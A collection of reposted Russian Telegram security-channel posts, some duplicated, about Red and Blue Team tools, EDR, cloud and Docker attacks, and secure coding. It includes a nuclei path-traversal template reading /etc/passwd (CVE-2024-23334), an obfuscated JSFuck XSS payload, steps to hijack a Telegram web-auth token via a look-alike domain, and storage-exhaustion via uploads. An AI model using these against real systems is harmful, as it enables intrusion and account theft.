Forwarded from S.E.Reborn
🛡Сравнение различных EDR. Большинство проседает по exe и dll.
• https://therecord.media/state-of-the-art-edrs-are-not-perfect-fail-to-detect-common-attacks/
• https://www.mdpi.com/2624-800X/1/3/21/htm
🔖 Endpoint Detection and Response (EDR) — класс решений для обнаружения и изучения вредоносной активности на конечных точках: подключенных к сети рабочих станциях, серверах, iot и так далее. В отличие от антивирусов, задача которых — бороться с типовыми и массовыми угрозами, EDR-решения ориентированы на выявление целевых атак и сложных угроз. При этом EDR-решения не могут полностью заменить антивирусы (EPP), поскольку эти две технологии решают разные задачи.
#EDR #Red_Team
• https://therecord.media/state-of-the-art-edrs-are-not-perfect-fail-to-detect-common-attacks/
• https://www.mdpi.com/2624-800X/1/3/21/htm
🔖 Endpoint Detection and Response (EDR) — класс решений для обнаружения и изучения вредоносной активности на конечных точках: подключенных к сети рабочих станциях, серверах, iot и так далее. В отличие от антивирусов, задача которых — бороться с типовыми и массовыми угрозами, EDR-решения ориентированы на выявление целевых атак и сложных угроз. При этом EDR-решения не могут полностью заменить антивирусы (EPP), поскольку эти две технологии решают разные задачи.
#EDR #Red_Team
Forwarded from Social Engineering
👾 Выявление угроз и реагирование. Инструменты для Blue Team.
Индустрия информационной безопасности асимметрична: атакующий находится в более удобном положении, чем специалист по защите. Атакованной стороне нужно быть эффективной всегда, 24/7, а нападающей достаточно быть эффективной лишь единожды. Кроме того, у атакующего есть возможность тщательно изучить свою жертву перед активной фазой атаки, в то время как другая сторона начинает изучение нарушителя уже во время этой атаки.
• Blue Team Training Toolkit (BT3) — Старый, но полезный инструмент. Позволяет имитировать заражение вредоносным ПО, изучать особенности поведения малвари и анализировать происходящее в сетевом трафике.
• Atomic Red Team — библиотека тестов на базе MITRE ATT&CK, эмулирующих действия Red Team команды. У проекта есть небольшая, но очень полезная документация.
• APT Simulator — крайне полезный набор скриптов под #Windows. Используется для того, чтобы система выглядела так, как будто была скомпрометирована — подойдет в качестве проверки для Blue Team и проверки средств защиты.
• https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/attack-simulator?view=o365-worldwide - эмулятор фишинговых атак и подбора пароля к учетным записям от Microsoft.
• Caldera — отличный фреймворк на базе MITRE ATT&CK, который имитирует взломанную систему, его плюс - отдельные плагины, которые можно подключать по мере необходимости.
📌 Дополнительная информация:
• Информационная безопасность. Функционал и отличия команд: https://t.me/Social_engineering/1404
• Необходимая и крайне полезная подборка материала для #Blue_Team: https://github.com/CyberSecurityUP/Awesome-Blue-Team-Operations
• Operator Handbook — это полезное руководство, которое содержит три дисциплины (Red Team, #OSINT, Blue Team) и объединяет их в одно полное справочное руководство. Книга содержит 123 отдельных списка шпаргалок для многих наиболее часто используемых инструментов и методов. Более 400 страниц информации, которая поможет Социальным Инженерам, Red Team и Blue Team специалистам.
#Red_Team #Blue_Team. Твой S.E.
Индустрия информационной безопасности асимметрична: атакующий находится в более удобном положении, чем специалист по защите. Атакованной стороне нужно быть эффективной всегда, 24/7, а нападающей достаточно быть эффективной лишь единожды. Кроме того, у атакующего есть возможность тщательно изучить свою жертву перед активной фазой атаки, в то время как другая сторона начинает изучение нарушителя уже во время этой атаки.
🖖🏻 Приветствую тебя user_name.• Сегодня поговорим о крутых инструментах, благодаря которым, Blue Team может тренироваться в выявлении угроз и реагировании на них.
• Blue Team Training Toolkit (BT3) — Старый, но полезный инструмент. Позволяет имитировать заражение вредоносным ПО, изучать особенности поведения малвари и анализировать происходящее в сетевом трафике.
• Atomic Red Team — библиотека тестов на базе MITRE ATT&CK, эмулирующих действия Red Team команды. У проекта есть небольшая, но очень полезная документация.
• APT Simulator — крайне полезный набор скриптов под #Windows. Используется для того, чтобы система выглядела так, как будто была скомпрометирована — подойдет в качестве проверки для Blue Team и проверки средств защиты.
• https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/attack-simulator?view=o365-worldwide - эмулятор фишинговых атак и подбора пароля к учетным записям от Microsoft.
• Caldera — отличный фреймворк на базе MITRE ATT&CK, который имитирует взломанную систему, его плюс - отдельные плагины, которые можно подключать по мере необходимости.
📌 Дополнительная информация:
• Информационная безопасность. Функционал и отличия команд: https://t.me/Social_engineering/1404
• Необходимая и крайне полезная подборка материала для #Blue_Team: https://github.com/CyberSecurityUP/Awesome-Blue-Team-Operations
• Operator Handbook — это полезное руководство, которое содержит три дисциплины (Red Team, #OSINT, Blue Team) и объединяет их в одно полное справочное руководство. Книга содержит 123 отдельных списка шпаргалок для многих наиболее часто используемых инструментов и методов. Более 400 страниц информации, которая поможет Социальным Инженерам, Red Team и Blue Team специалистам.
#Red_Team #Blue_Team. Твой S.E.
Forwarded from Social Engineering
👺 Оттенки красного. Роли Red Team.
• Учитывайте информацию: Ключевые роли, количество человек (состав тимы), различные особенности и эффективность, зависит от многих факторов. Например от ограниченного бюджета или сложности проекта. Описанные ниже роли весьма условны и многие специалисты тесно переплетаются между собой. Перечислю ключевые (на мой взгляд) роли Red Team:
1. Руководитель проекта. Отвечает за планирование, стратегию, решение различных и спорных вопросов, отвечает за взаимодействие между ключевыми фигурами в компании. Руководителем может быть любой член команды в пределах одного проекта.
2. Разработка. Написание различных инструментов под определенные нужды тимы. Перечислю несколько основных характеристик, которыми должен обладать разработчик команды:
• Понимание принципов работы основных защитных решений.
• Опыт разработки средств эксплуатации.
• Скорость разработки MVP (minimal viable product).
3. Социальная Инженерия. Роль включает в себя огромное кол-во пунктов, начиная от фишинга и заканчивая физическим проникновением на территорию организации, с целью получить необходимую информацию, установкой различных инструментов для продвижения и т.д.
4. Исследователь уязвимостей. Эксперт, который умеет эффективно находить уязвимости в выделенных доменах: мобильных, десктопных, веб-приложениях и т.д.
5. DevOps. Должен отвечать за инфраструктуру тимы. Например, поддержание работы С2-серверов или работы серверов для рассылки фишинга.
6. Аналитик. Проводит анализ полученных данных во время проведения операции, дает рекомендации и указывает на недостатки которые были обнаруженные во время проведения работ. Взаимодействует с Blue Team.
7. Penetration Testing. Навык, который должен быть у каждого члена команды, включая аналитика. Каждый из участников должен уметь «ломать» любую рабочую станцию на сервисе вроде HTB.
8. Training. Навык обучения крайне важен, так как основной целью Red Team является повышение эффективности работы Blue Team. Для реализации качественного процесса обучения, требуется четко понимать проблемы синей команды и уметь правильно предоставить необходимую информацию, которая формируется на основе полученных данных от Red Team.
📌 Обязательно ознакомься со следующим материалом:
Информационная безопасность. Функционал и отличия команд.
5 Мифов о Red Teaming.
Red/Blue Team – детальный обзор.
Как хакеры врываются в энергосистему США.
Проект Red Team: организация, управление, скоуп.
Red Team: командное взаимодействие при проведении тестирования на проникновение.
Твой S.E. #Red_Team #Blue_Team #ИБ
🖖🏻 Приветствую тебя user_name.
• Как уже понятно из названия поста, сегодня мы поговорим о составе Red Team. Возможно не самая полезная тема, но мне хотелось бы добавить данную статью к общему списку касательно #Red_Team + новичкам будет полезно.• Учитывайте информацию: Ключевые роли, количество человек (состав тимы), различные особенности и эффективность, зависит от многих факторов. Например от ограниченного бюджета или сложности проекта. Описанные ниже роли весьма условны и многие специалисты тесно переплетаются между собой. Перечислю ключевые (на мой взгляд) роли Red Team:
1. Руководитель проекта. Отвечает за планирование, стратегию, решение различных и спорных вопросов, отвечает за взаимодействие между ключевыми фигурами в компании. Руководителем может быть любой член команды в пределах одного проекта.
2. Разработка. Написание различных инструментов под определенные нужды тимы. Перечислю несколько основных характеристик, которыми должен обладать разработчик команды:
• Понимание принципов работы основных защитных решений.
• Опыт разработки средств эксплуатации.
• Скорость разработки MVP (minimal viable product).
3. Социальная Инженерия. Роль включает в себя огромное кол-во пунктов, начиная от фишинга и заканчивая физическим проникновением на территорию организации, с целью получить необходимую информацию, установкой различных инструментов для продвижения и т.д.
4. Исследователь уязвимостей. Эксперт, который умеет эффективно находить уязвимости в выделенных доменах: мобильных, десктопных, веб-приложениях и т.д.
5. DevOps. Должен отвечать за инфраструктуру тимы. Например, поддержание работы С2-серверов или работы серверов для рассылки фишинга.
6. Аналитик. Проводит анализ полученных данных во время проведения операции, дает рекомендации и указывает на недостатки которые были обнаруженные во время проведения работ. Взаимодействует с Blue Team.
7. Penetration Testing. Навык, который должен быть у каждого члена команды, включая аналитика. Каждый из участников должен уметь «ломать» любую рабочую станцию на сервисе вроде HTB.
8. Training. Навык обучения крайне важен, так как основной целью Red Team является повышение эффективности работы Blue Team. Для реализации качественного процесса обучения, требуется четко понимать проблемы синей команды и уметь правильно предоставить необходимую информацию, которая формируется на основе полученных данных от Red Team.
📌 Обязательно ознакомься со следующим материалом:
Информационная безопасность. Функционал и отличия команд.
5 Мифов о Red Teaming.
Red/Blue Team – детальный обзор.
Как хакеры врываются в энергосистему США.
Проект Red Team: организация, управление, скоуп.
Red Team: командное взаимодействие при проведении тестирования на проникновение.
Твой S.E. #Red_Team #Blue_Team #ИБ
367616.gif
13.6 MB
#red_team
Важной фичей является не только цветной вывод, что упрощает визуальный просмотр логов. Но он ещё парсит и сразу размечает, что это была за атака, к примеру перебор директорий, краулеры, веб атаки (не различает конкретно XSS, SQLi), но по контексту и запросу легко можно понять, что за атака.
Использование:
cat /var/log/nginx/access.log | teler
или
teler -i /var/log/nginx/access.log
Разницы в использовании нет, но думаю на чересчур большом логе, чтение из самого teler будет производительнее
Утилиты написаны на
Please open Telegram to view this post
VIEW IN TELEGRAM
#CVE #python #red_team
Исследователи предупреждают, что недавно исправленная уязвимость в Python-библиотеке aiohttp (CVE-2024-23334) уже взята на вооружение хакерами, включая вымогательские группировки, такие как ShadowSyndicate.
Aiohttp — это опенсорсная библиотека, построенная на основе I/O фреймворка Asyncio и предназначенная для обработки большого количества одновременных HTTP-запросов без традиционного потокового нетворкинга. Aiohttp часто используется технологическими компаниями, веб-разработчиками, бэкенд-инженерами и специалистами по анализу данных для создания высокопроизводительных веб-приложений и сервисов, объединяющих данные из множества внешних API.
id: "aiohttp"
info:
name: aiohttp LFI
author: crth0
severity: high
description: CVE-2024-23334 Check LFI.
reference:
- https://github.com/jhonnybonny
classification:
tags: aiohttp,LFI,CVE-2024-23334
http:
- method: GET
path:
- '{{BaseURL}}/static/../etc/passwd'
- '{{BaseURL}}/static/../../etc/passwd'
- '{{BaseURL}}/static/../../../etc/passwd'
- '{{BaseURL}}/static/../../../../etc/passwd'
- '{{BaseURL}}/static/../../../../../etc/passwd'
- '{{BaseURL}}/static/../../../../../../etc/passwd'
- '{{BaseURL}}/static/../../../../../../../etc/passwd'
- '{{BaseURL}}/static/../../../../../../../../etc/passwd'
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(body, "root:")'
condition: and
по сути даже шаблона не нужно, тут обычный path traversal
Please open Telegram to view this post
VIEW IN TELEGRAM
#сети #red_team
MITM — это самая импактная атака, которую можно провести в сети. Но одновременно это и самая опасная техника с точки зрения рисков для инфраструктуры. В этой статье Магама расскажет о том, как спуфить при пентесте, чтобы ничего не сломать по дороге и не устроить DoS.
Начнем с теории. Магама показал, какие параметры нужны для корректного проведения MITM. Эти настройки позволят вам избежать непреднамеренного DoS.
Please open Telegram to view this post
VIEW IN TELEGRAM
#cloud #red_team #lab #cheatsheet
Поиск данный репы вдохновлен тем, что по работе был проект, где заказчик использовал Azure в качестве инфраструктуры и множество сервисов на AWS. По сути в РФ уже такое не встретишь, хоть в своё время изучал AWS и учился разворачивать различные бакеты, но уже подзабылось за ненадобностью
А также, данный репозиторий собрал в себе информацию по:
AWS
GCP
Azure
Kubernetes
Awesome Cloud Security Labs - репозиторий, с подборкой лаб для практики похека cloud провайдеров. Есть как self hosted, так и HTB like.
Please open Telegram to view this post
VIEW IN TELEGRAM
Атакуем баржи контейнеры 🖼️
#docker #red_team #escape
За последние пару лет Docker стал очень популярным, как в разработке, так и у пентестеров. Поэтому с каждым годов всё больше компаний переносят инфру на него и кубер. Поэтому нашёл для вас неплохую статью про атаки на докер, которая даст вам как минимум минимальное понимание как атаковать контейнеры, когда вы с ними встретитесь)
➡️ Далее
🌚 @poxek
#docker #red_team #escape
За последние пару лет Docker стал очень популярным, как в разработке, так и у пентестеров. Поэтому с каждым годов всё больше компаний переносят инфру на него и кубер. Поэтому нашёл для вас неплохую статью про атаки на докер, которая даст вам как минимум минимальное понимание как атаковать контейнеры, когда вы с ними встретитесь)
Please open Telegram to view this post
VIEW IN TELEGRAM
#IoT #ИнтернетВещей #red_team
Genzai помогает найти панели управления, связанные с IoT / Интернета вещей, по одной или нескольким целям, а также проверить их на наличие паролей по умолчанию и потенциальных уязвимостей на основе путей и версий.
Please open Telegram to view this post
VIEW IN TELEGRAM
Принёс вам маленькую удобную плюшку
#red_team #fileupload
При проведении пентестов, часто сталкиваемся с тем, что можно попробовать загрузить для проверки функции загрузки файлов или для content spoofing'а. Так вот один юзер тоже задался таким вопросом и таки написал тулзу, которая генерирует картинки без какого специфичного содержания.
А то заказчик может неправильно понять и обидеться на какую-то картинку
А ещё из недавно, нужно было проверить какой максимальный размер может поглотить загрузка файлов. Был архив с NvidiaRTX Chat на 35 гб. Такой большой объем не ел, а допустим на 5 или 15 гб не смог у себя файлы найти, чтобы это были не какие-то важные архивы. Так вот эта утилита может ещё и картинки любого размера генерировать)
Возможно вы и не сделаете file upload bypass, но переполнить хранилище сервера с лёгкостью, если конечно предыдущие картинки не удаляются.
Установка:
лично у меня не получилось её поставить таким способом. Только через гитклон и ручную установку зависимостей забейте, я разобрался))
Использование:
Как я писал выше, только при png мы можем свободно менять размер. Тогда какие форматы ещё поддерживаются? jpeg и pdf.
Если получится, то на досуге перепишу эту тулзу, чтобы она точно у всех работала и собиралась. Но идея проекта не безосновательная.
🧩 Github
🌚 @poxek
#red_team #fileupload
При проведении пентестов, часто сталкиваемся с тем, что можно попробовать загрузить для проверки функции загрузки файлов или для content spoofing'а. Так вот один юзер тоже задался таким вопросом и таки написал тулзу, которая генерирует картинки без какого специфичного содержания.
А ещё из недавно, нужно было проверить какой максимальный размер может поглотить загрузка файлов. Был архив с NvidiaRTX Chat на 35 гб. Такой большой объем не ел, а допустим на 5 или 15 гб не смог у себя файлы найти, чтобы это были не какие-то важные архивы. Так вот эта утилита может ещё и картинки любого размера генерировать)
Возможно вы и не сделаете file upload bypass, но переполнить хранилище сервера с лёгкостью, если конечно предыдущие картинки не удаляются.
Установка:
pip install git+ssh://git@github.com/sterrasec/dummy.git
Использование:
# Самый простой вариант. Текст по умолчанию "dummy file"
dummy test1.jpeg
# Далее можно поиграться с текстом, чтобы заказчик точно понял, что это оставили мы
dummy -t poxek test2.png
# Далее можем поиграться с размером. Но генерация произвольного размера возможна только для png
dummy -t poxek -b 10MB test3.png
Как я писал выше, только при png мы можем свободно менять размер. Тогда какие форматы ещё поддерживаются? jpeg и pdf.
Если получится, то на досуге перепишу эту тулзу, чтобы она точно у всех работала и собиралась. Но идея проекта не безосновательная.
Please open Telegram to view this post
VIEW IN TELEGRAM
Secure Coding Cheatsheets
#appsec #dev #devsecops #red_team #blue_team #SSDLC
Статья на тему безопасной разработки. В статье автор разобрал примеры уязвимостей в коде и как их избегать.
Кому полезен материал: appsec'арям, пентестерам, devsecops'ам и разрабам естественно
Также он показывает примеры не на одном языке, а на:
➡️ C#(.Net)
➡️ PHP
➡️ Go
➡️ Python
➡️ Java
➡️ Android Java
➡️ iOS Swift
Полезно почитать всем, по факту он выбрал самые популярные технологически стеки.
Автор разобрал следующие уязвимости:
➡️ Broken Access Control (Небезопасная управление доступом)
➡️ Cryptographic Failures (Криптографические недостатки)
➡️ Injection (Инъекции)
➡️ Insecure Design (Небезопасный дизайн проектирования)
➡️ Security Misconfiguration (Небезопасная настройка чего либо)
➡️ Vulnerable and Outdated Components (Уязвимые и/или не обновленные компоненты)
➡️ Inadequate Supply Chain Security (Уязвимость в цепочке поставок)
➡️ Insecure Authentication/Authorization (Небезопасная аутентификация/авторизация)
➡️ Insufficient Input/Output Validation (Недостаточная фильтрация ввода/вывода)
➡️ Insecure Communication (Небезопасная передача информации)
➡️ Improper Credential Usage (Неправильное хранение учетных данных)
➡️ Inadequate Privacy Controls (Неправильный контроль конфиденциальности)
Каждый найдет для себя что-то)
➡️ Статеечка
🌚 @poxek
#appsec #dev #devsecops #red_team #blue_team #SSDLC
Статья на тему безопасной разработки. В статье автор разобрал примеры уязвимостей в коде и как их избегать.
Кому полезен материал: appsec'арям, пентестерам, devsecops'ам и разрабам естественно
Также он показывает примеры не на одном языке, а на:
Полезно почитать всем, по факту он выбрал самые популярные технологически стеки.
Автор разобрал следующие уязвимости:
Каждый найдет для себя что-то)
Please open Telegram to view this post
VIEW IN TELEGRAM
На мушке у APT-группировок: kill chain из восьми шагов и котики
#red_team #APT
Авторы собрали информацию о 16 хакерских группировках, атакующих Ближний Восток, другой (а точнее — другая) проанализировал их тактики и техники, результатом этого тандема стало большое исследование. В этой статье авторы расскажут о том, как действуют APT-группировки, с чего начинают атаку и как развивают ее, двигаясь к намеченной цели.
➡️ Читать далее
🌚 @poxek
#red_team #APT
Авторы собрали информацию о 16 хакерских группировках, атакующих Ближний Восток, другой (а точнее — другая) проанализировал их тактики и техники, результатом этого тандема стало большое исследование. В этой статье авторы расскажут о том, как действуют APT-группировки, с чего начинают атаку и как развивают ее, двигаясь к намеченной цели.
Please open Telegram to view this post
VIEW IN TELEGRAM
Крадем чужой телеграм аккаунт за 10 секунд 😎
#telegram #red_team
Ресерч совсем свежий, ему всего 6 дней)
Так что радуйтесь, харкорный контент по вебу возвращается, для тех кто его ждал и дождался.
Давайте попробуем вместе разобраться, как эта атака сработала. Энтрипоинт здесь это авто аутентификации в веб версии телеги при переходе их клиента телеграма (desktop & smart).
При открытии этой ссылки у вас в URL подставляется токен аутентификации в аккаунт.
Далее автор собрала свою версию tdesktop и анализировала код в поисках захаркорженных доменов телеги. И нашли их.
Далее она начала разбирать как формируется ссылку на авто аутентификацию
И ещё кучу примеров
Все домены, кроме web.telegram.org, как бы созданы для глубоких ссылок t.me. Переход по любому из них без пути приведет вас на домашнюю страницу telegram.org. При переходе по одной из них с совместимым путем, например z.t.me/share?url=lyra.horse, откроется соответствующий клиент с фрагментом хэша, например:
https://web.telegram.org/a/#?tgaddr=tg%3A%2F%2Fmsg_url%3Furl%3Dlyra.horse
Обычно это делается с помощью HTTP 301 редиректа, но если параметр
Малоизвестный факт, что legacy версия веб клиента telegram всё ещё доступна по адресу:
Как итог, автор не смогла найти ничего интересного в WebK, но и WebZ, и старый клиент дали несколько многообещающих зацепок в работе с
Аналогичный ресерч был проведен и для iOS & Android, но те или иные техники уже не сработают на актуальных версиях приложения и/или ОСи.
Так и что? Нет эксплойта?
По сути да, эксплойта нет. Но автор смогла упростить атаку при физическом воздействии до возможного минимума затрат времени - менее 10 секунд.
➡️ Для начала отправьте "
➡️ Это перенаправит их браузер на
➡️ Отсюда мы изменим домен в браузере на
➡️ JS на моем домене будет работать дальше, регистрируя одно из устройств автора с помощью токена.
Да, это атака реализуется только при физическом доступе к устройству, к сожалению, но всё равно это впечатляющий результат и я думаю эта атака будет полезна тем ребятам, кто занимается физическим пентестом.
➡️ Если вы что-то не поняли из моего вольного перевода, то здесь сможете найти оригинал статьи
🌚 @poxek
#telegram #red_team
Ресерч совсем свежий, ему всего 6 дней)
Так что радуйтесь, харкорный контент по вебу возвращается, для тех кто его ждал и дождался.
Давайте попробуем вместе разобраться, как эта атака сработала. Энтрипоинт здесь это авто аутентификации в веб версии телеги при переходе их клиента телеграма (desktop & smart).
При открытии этой ссылки у вас в URL подставляется токен аутентификации в аккаунт.
Далее автор собрала свою версию tdesktop и анализировала код в поисках захаркорженных доменов телеги. И нашли их.
Далее она начала разбирать как формируется ссылку на авто аутентификацию
http://web.telegram.org/ becomes https://web.telegram.org/#tgWebAuthToken=...
https://z.t.me/pony becomes https://z.t.me/pony?tgWebAuth=1#tgWebAuthToken=...
https://k.t.me/#po=ny becomes https://k.t.me/?tgWebAuth=1#po=ny&tgWebAuthToken=...
И ещё кучу примеров
Все домены, кроме web.telegram.org, как бы созданы для глубоких ссылок t.me. Переход по любому из них без пути приведет вас на домашнюю страницу telegram.org. При переходе по одной из них с совместимым путем, например z.t.me/share?url=lyra.horse, откроется соответствующий клиент с фрагментом хэша, например:
https://web.telegram.org/a/#?tgaddr=tg%3A%2F%2Fmsg_url%3Furl%3Dlyra.horse
Обычно это делается с помощью HTTP 301 редиректа, но если параметр
tgWebAuth
установлен и deep link действительна, то вместо этого вы сможете запустить этот забавный javascript:<html>
<head>
<meta name="robots" content="noindex, nofollow">
<noscript><meta http-equiv="refresh" content="0;url='https://web.telegram.org/a/#?tgaddr=tg%3A%2F%2Fmsg_url%3Furl%3Dlyra.horse'"></noscript>
<script>
try {
var url = "https:\/\/web.telegram.org\/a\/#?tgaddr=tg%3A%2F%2Fmsg_url%3Furl%3Dlyra.horse";
var hash = location.hash.toString();
if (hash.substr(0, 1) == '#') {
hash = hash.substr(1);
}
location.replace(hash ? urlAppendHashParams(url, hash) : url);
} catch (e) { location.href=url; }
function urlAppendHashParams(url, addHash) {
var ind = url.indexOf('#');
if (ind < 0) {
return url + '#' + addHash;
}
var curHash = url.substr(ind + 1);
if (curHash.indexOf('=') >= 0 || curHash.indexOf('?') >= 0) {
return url + '&' + addHash;
}
if (curHash.length > 0) {
return url + '?' + addHash;
}
return url + addHash;
}
</script>
</head>
</html>
Малоизвестный факт, что legacy версия веб клиента telegram всё ещё доступна по адресу:
web.telegram.org/?legacy=1
. Более того, сессия разделяется между веб-клиентами, поэтому эксплойт в старом веб-клиенте может быть полезен, даже если цель использует современный веб-клиент.Как итог, автор не смогла найти ничего интересного в WebK, но и WebZ, и старый клиент дали несколько многообещающих зацепок в работе с
tgaddr
в URL. Однако это оказалось тупиком для её исследования, поскольку я не смог найти способ избавиться от амперсанда в части URL &tgWebAuthToken=... или обойти его. Я даже возился с юникодом, чтобы посмотреть, не позволит ли он мне каким-то образом "стереть" амперсанд, но, похоже, UTF-8 был разработан так, чтобы противостоять этому.Аналогичный ресерч был проведен и для iOS & Android, но те или иные техники уже не сработают на актуальных версиях приложения и/или ОСи.
Так и что? Нет эксплойта?
По сути да, эксплойта нет. Но автор смогла упростить атаку при физическом воздействии до возможного минимума затрат времени - менее 10 секунд.
z.t.me
" в приложении Telegram и нажмите на ссылку. telegram.org/#tgWebAuthToken=
telegramz.org
- домен, которым владеет автор, - и нажимаете Enter. Да, это атака реализуется только при физическом доступе к устройству, к сожалению, но всё равно это впечатляющий результат и я думаю эта атака будет полезна тем ребятам, кто занимается физическим пентестом.
Please open Telegram to view this post
VIEW IN TELEGRAM
#js #xss #red_team
JSFuck - это эзотерический и образовательный стиль программирования, основанный на атомарных частях JavaScript. В нем используется всего 6 различных символов для написания и выполнения кода.
Он не зависит от браузера, поэтому его можно запускать даже на Node.js.
Как пример, нагрузка alert(1) будет преобразована в
[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]][([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((!![]+[])[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+([][[]]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+!+[]]+(+[![]]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+!+[]]]+(!![]+[])[!+[]+!+[]+!+[]]+(+(!+[]+!+[]+!+[]+[+!+[]]))[(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+([]+[])[([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]][([][[]]+[])[+!+[]]+(![]+[])[+!+[]]+((+[])[([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[+!+[]+[+!+[]]]+(!![]+[])[!+[]+!+[]+!+[]]]](!+[]+!+[]+!+[]+[!+[]+!+[]])+(![]+[])[+!+[]]+(![]+[])[!+[]+!+[]])()((![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[+!+[]+[!+[]+!+[]+!+[]]]+[+!+[]]+([+[]]+![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[!+[]+!+[]+[+[]]])
и опять же, оно будет работать в любом браузере и даже в nodejs)
на сайте представлена базовые символы и их "шифрованный варивант":
false => ![]
true => !![]
undefined => [][[]]
NaN => +[![]]
0 => +[]
1 => +!+[]
2 => !+[]+!+[]
10 => [+!+[]]+[+[]]
Array => []
Number => +[]
String => []+[]
Boolean => ![]
Function => []["filter"]
eval => []["filter"]["constructor"]( CODE )()
window => []["filter"]["constructor"]("return this")()
ещё больше вариантов можно посмотреть здесь ТЫК
Если интересно почитать про то, как это работает, то вам сюда ТЫК
Please open Telegram to view this post
VIEW IN TELEGRAM
Раскрываем секретные функции: магия макросов в Burp Suite
#burpsuite #red_team
Привет! Если ты думаешь, что знаешь всё о Burp Suite, я тебя удивлю! Этот мощный инструмент для тестирования веб-приложений скрывает в себе ещё больше возможностей, способных значительно упростить и ускорить работу. Сегодня мы изучим функционал макросов на практике и увидим, как они могут стать надежным помощником в процессе тестирования и анализа веб-приложений.
Эта статья мне напомнила мне один из докладов на Bugs Zone (багхантерская приватка от BI.ZONE), там был схожий по смыслу доклад. Поэтому решил поделиться этой статьёй с теми, кто ещё не знает про макросы в нашем любимом Бурпсуютике.
🐭 Как итог статьи, автор наглядно показал, как можно сделать четыре действия в одно действие)
📌 Читать статью
🌚 @poxek
#burpsuite #red_team
Привет! Если ты думаешь, что знаешь всё о Burp Suite, я тебя удивлю! Этот мощный инструмент для тестирования веб-приложений скрывает в себе ещё больше возможностей, способных значительно упростить и ускорить работу. Сегодня мы изучим функционал макросов на практике и увидим, как они могут стать надежным помощником в процессе тестирования и анализа веб-приложений.
Эта статья мне напомнила мне один из докладов на Bugs Zone (багхантерская приватка от BI.ZONE), там был схожий по смыслу доклад. Поэтому решил поделиться этой статьёй с теми, кто ещё не знает про макросы в нашем любимом Бурпсуютике.
Please open Telegram to view this post
VIEW IN TELEGRAM
#red_team #AD #windows
Я думаю все кто занимались пентестом инфры AD дольше 1 дня знакомы с PingCastle. Классная тулза, которая может проверять AD на мисконфиги и уязвимости. В ней удобно очень много чего. Она умеет как в обычный health check безопасности AD, до чуть ли не готовой презентации для руководства.
Недавно заходила речь о построении CVM (continuous vuln management) внутрянки. И я задавался вопросом, а как его сделать. Поставить тупо nuclei во внутренний контур мало, а какой-то ещё удобной автоматизации нет, шоб с отчётиками красивыми и/или понятными. Так вот нашёл для вас удобную автоматизацию, тем более с интеграцией в Teams/Slack(им кто-то ещё пользуется?).
Это небольшой powershell скрипт, который будет мониторить изменения в отчётах, к примеру pingcastle нашёл новую вулну, вам прилетит уведомление, что-то пропатчили, вам опять же придёт уведомление. Удобно? Очень!
Подготовка:
Reports
внутри PingCastleДалее потребуется настроить уведомления, следовательно создать бота ТЫК
Наконец создать повторяющийся таск в AD ТЫК
По сути всё, мы собрали бюджетный CVM AD на коленки.
Please open Telegram to view this post
VIEW IN TELEGRAM
